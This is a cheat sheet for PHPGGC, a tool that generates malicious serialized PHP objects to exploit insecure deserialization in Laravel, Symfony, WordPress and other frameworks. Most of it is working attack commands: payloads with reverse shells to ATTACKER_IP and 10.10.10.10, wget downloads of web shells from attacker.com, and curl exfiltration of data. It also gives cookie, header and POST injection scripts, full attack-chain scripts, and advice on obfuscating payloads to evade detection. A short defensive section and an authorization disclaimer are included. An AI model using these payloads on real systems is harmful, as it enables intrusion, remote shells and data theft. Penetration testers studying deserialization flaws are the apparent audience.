PHPGGC
Overview
PHPGGC (PHP Generic Gadget Chains) is a tool for generating malicious serialized PHP objects that exploit insecure deserialization vulnerabilities. It leverages “gadget chains” from common PHP frameworks and libraries to achieve remote code execution (RCE) when vulnerable applications unserialize untrusted data.
Key Features:
- Pre-built gadget chains for popular PHP frameworks
- Automatic payload generation for common targets
- Support for multiple exploitation techniques
- Chain discovery and analysis
- Custom gadget chain creation
- Integration with exploitation frameworks
Installation
From GitHub
git clone https://github.com/ambionics/phpggc.git
cd phpggcVerify Installation
./phpggc --version
./phpggc -lDocker
docker run -it --rm ambionics/phpggcRequirements
- PHP 7.0+ or 8.0+
- Composer (optional, for dependency management)
Basic Usage
List Available Gadget Chains
./phpggc -l
./phpggc -l | grep "Laravel"Generate Simple Payload
./phpggc Laravel/RCEGenerate With Command
./phpggc Laravel/RCE system "whoami"Specify Output Format
./phpggc -f json Laravel/RCE system "whoami"
./phpggc -f phtml Laravel/RCE system "whoami"Core Commands
| Command | Description |
|---|---|
-l, --list | List all available gadget chains |
-i, --info | Show detailed chain information |
-c, --chains | Show chains for specific framework |
-f, --format | Output format (raw, base64, json, phtml, etc.) |
-s, --side-effect | Generate chain with side effects |
--template | Use custom template for payload |
--skip-vulnerabilities | Skip vulnerability checks |
--verbose | Verbose output |
Available Gadget Chains
Laravel Chains
# RCE via Laravel gadgets
./phpggc Laravel/RCE
# List all Laravel chains
./phpggc -l | grep -i laravelSymfony Chains
# RCE via Symfony
./phpggc Symfony/RCE
# EventDispatcher exploitation
./phpggc -i Symfony/EventDispatcherWordPress Chains
# WordPress plugin exploitation
./phpggc WordPress/RCE
./phpggc WordPress/PluginZend Framework Chains
# Zend/Laminas exploitation
./phpggc Zend/RCE
./phpggc Laminas/RCEOther Popular Frameworks
./phpggc Yii/RCE
./phpggc CakePHP/RCE
./phpggc Doctrine/RCE
./phpggc Magento/RCEOutput Formats
Raw Serialized Format
./phpggc -f raw Laravel/RCE system "whoami"Base64 Encoded
./phpggc -f base64 Laravel/RCE system "whoami"URL Encoded
./phpggc -f url Laravel/RCE system "whoami"JSON Format
./phpggc -f json Laravel/RCE system "whoami"PHTML (PHP file)
./phpggc -f phtml Laravel/RCE system "whoami" > payload.php
php payload.phpExploitation Techniques
Remote Command Execution
# Execute system commands
./phpggc Laravel/RCE system "id"
./phpggc Laravel/RCE system "cat /etc/passwd"
./phpggc Laravel/RCE system "curl http://attacker.com"Reverse Shell
# Generate reverse shell payload
./phpggc Laravel/RCE system "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"
# Or with nc
./phpggc Laravel/RCE system "nc -e /bin/bash ATTACKER_IP 4444"File Writing
# Write files via payload
./phpggc Laravel/RCE system "echo 'shell code' > /tmp/shell.php"
# More complex file operations
./phpggc Laravel/RCE system "wget http://attacker.com/shell.php -O /var/www/shell.php"Data Exfiltration
# Extract sensitive data
./phpggc Laravel/RCE system "cat /var/www/config.php | base64"
# Curl exfiltration
./phpggc Laravel/RCE system "curl http://attacker.com/log.php?data=$(whoami)"Chain Information and Analysis
Detailed Chain Information
# Get full details about a chain
./phpggc -i Laravel/RCE
# Show vulnerability details
./phpggc -i Symfony/RCE --verboseList Chains by Framework
# All chains for a specific framework
./phpggc -l Laravel
./phpggc -l WordPress
./phpggc -l SymfonySearch for Specific Gadgets
# Find chains containing specific keywords
./phpggc -l | grep -i "file"
./phpggc -l | grep -i "execute"Advanced Usage
Custom Templates
# Using custom template file
./phpggc -f raw --template custom.template Laravel/RCE system "whoami"Side Effect Chains
# Chains with side effects (file write, etc.)
./phpggc -s Laravel/RCE system "whoami"Chaining Multiple Commands
# Execute multiple commands
./phpggc Laravel/RCE system "id; whoami; pwd"
# Or use command separator
./phpggc Laravel/RCE system "cmd1 && cmd2 && cmd3"Bypassing Filters
# Using alternative command syntax
./phpggc Laravel/RCE system "sh -c 'command'"
# Hex encoding commands
./phpggc Laravel/RCE system "echo 'x' | xxd -r -p"Integration with Exploitation Workflows
Web Application Testing
# Generate payload for cookie injection
PAYLOAD=$(./phpggc -f base64 Laravel/RCE system "whoami")
curl -b "session=$PAYLOAD" http://target.com
# For POST parameter
curl -X POST http://target.com -d "data=$(./phpggc -f url Laravel/RCE system 'id')"Automated Exploitation
# Generate payload and store in variable
PAYLOAD=$(./phpggc -f raw Laravel/RCE system "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1")
# Use in exploitation script
php -r "echo unserialize(base64_decode('$PAYLOAD'));"Testing Multiple Frameworks
#!/bin/bash
# Test multiple framework vulnerabilities
COMMAND="id"
for framework in Laravel Symfony Yii WordPress; do
echo "Testing $framework..."
./phpggc -f raw "$framework/RCE" system "$COMMAND"
doneSerialization and Injection Points
URL Parameter Injection
# Target URL with serialized parameter
curl "http://target.com/profile?data=$(./phpggc -f url Laravel/RCE system 'whoami')"Cookie Injection
# Inject serialized payload into cookie
curl -b "session=$(./phpggc -f base64 Laravel/RCE system 'id')" http://target.comPOST Body Injection
# Inject into POST parameter
curl -X POST http://target.com \
-d "profile=$(./phpggc -f url Laravel/RCE system 'whoami')"Header Injection
# Inject into custom header
curl -H "X-Data: $(./phpggc -f base64 Laravel/RCE system 'id')" http://target.comReal-World Exploitation Scenarios
Laravel Application RCE
# Step 1: Identify Laravel application
# Step 2: Find unserialize() call (typically in session handling)
# Step 3: Generate payload
PAYLOAD=$(./phpggc -f base64 Laravel/RCE system "whoami")
# Step 4: Inject into vulnerable endpoint
curl -b "PHPSESSID=$PAYLOAD" http://target-laravel.comWordPress Plugin Exploitation
# Identify vulnerable WordPress plugin using gadget chains
./phpggc -i WordPress/RCE
# Generate exploitation payload
./phpggc -f raw WordPress/RCE system "wp_create_user attacker password123"
# Or modify WordPress files
./phpggc WordPress/RCE system "wget http://attacker.com/shell.php -O /var/www/wp-content/shell.php"Symfony Application Attack
# Identify Symfony version and components
# Generate appropriate Symfony chain
./phpggc -l | grep Symfony
./phpggc -i Symfony/EventDispatcher
# Create payload targeting EventDispatcher
PAYLOAD=$(./phpggc -f base64 Symfony/RCE system "id")Payload Encoding and Obfuscation
Base64 Encoding
# Generate base64-encoded payload
./phpggc -f base64 Laravel/RCE system "whoami" > payload.b64
# Decode and execute
cat payload.b64 | base64 -d | phpURL Encoding
# Generate URL-safe payload
./phpggc -f url Laravel/RCE system "whoami"
# Use in URL parameter
echo "http://target.com?data=$(./phpggc -f url Laravel/RCE system 'id')"Hexadecimal Encoding
# Encode command to hex
echo -n "whoami" | xxd -p
# Use in payload
./phpggc Laravel/RCE system "echo '$(echo -n whoami | xxd -p)' | xxd -r -p"Defensive Analysis
Identify Vulnerable Code Patterns
# Look for unserialize() in source code
grep -r "unserialize" /path/to/php/app
# Check for user input passing to unserialize
grep -r "unserialize(\$_" /path/to/php/appTesting for Gadget Chain Exploitation
# Run test payload through application
PAYLOAD=$(./phpggc Laravel/RCE system "touch /tmp/test")
# Monitor for execution
tail -f /var/log/apache2/access.logVersion Detection
# Detect framework version for appropriate chains
curl -s http://target.com | grep -i "Laravel\|Symfony\|WordPress"
# Check composer.lock or package files
curl http://target.com/composer.lock 2>/dev/null | grep -i versionPractical Exploitation Workflow
Full Attack Chain
#!/bin/bash
TARGET="http://target.com"
FRAMEWORK="Laravel"
# Step 1: Identify vulnerability
echo "[+] Testing for deserialization vulnerabilities..."
# Step 2: Generate payload for RCE
COMMAND="bash -i >& /dev/tcp/10.10.10.10/4444 0>&1"
PAYLOAD=$(./phpggc -f base64 "$FRAMEWORK/RCE" system "$COMMAND")
# Step 3: Deliver payload
echo "[+] Injecting payload..."
curl -b "session=$PAYLOAD" "$TARGET/dashboard"
# Step 4: Listener
# nc -lvnp 4444Testing Multiple Injection Points
#!/bin/bash
PAYLOAD=$(./phpggc -f base64 Laravel/RCE system "id")
# Test different injection points
echo "Testing Cookie..."
curl -b "data=$PAYLOAD" http://target.com
echo "Testing POST..."
curl -X POST -d "input=$PAYLOAD" http://target.com
echo "Testing Header..."
curl -H "X-Custom: $PAYLOAD" http://target.comTroubleshooting
Payload Not Executing
# Verify PHP version compatibility
php --version
# Test payload locally first
php -r "echo unserialize(base64_decode('PAYLOAD_HERE'));"
# Check target uses unserialize()
grep -r "unserialize" target_code/Encoding Issues
# Test different output formats
./phpggc -f raw Laravel/RCE system "whoami"
./phpggc -f base64 Laravel/RCE system "whoami"
./phpggc -f json Laravel/RCE system "whoami"Chain Not Found
# Update PHPGGC database
git pull
./phpggc -l --refresh
# Check if framework is supported
./phpggc -l | grep -i "framework_name"Security Considerations
Safe Testing
- Only test on authorized systems
- Use isolated lab environments
- Document all testing activities
- Have rollback procedures ready
Payload Detection
- Avoid common payload patterns
- Use encoding/obfuscation
- Employ timing-based techniques
- Monitor system logs for detection
Version and Updates
# Check version
./phpggc --version
# Update gadget chains
cd phpggc && git pull origin masterLegal and Ethical Considerations
Critical: PHPGGC generates payloads for testing deserialization vulnerabilities only on systems where you have explicit authorization. Unauthorized exploitation is illegal. Always obtain written permission before conducting security assessments on any system.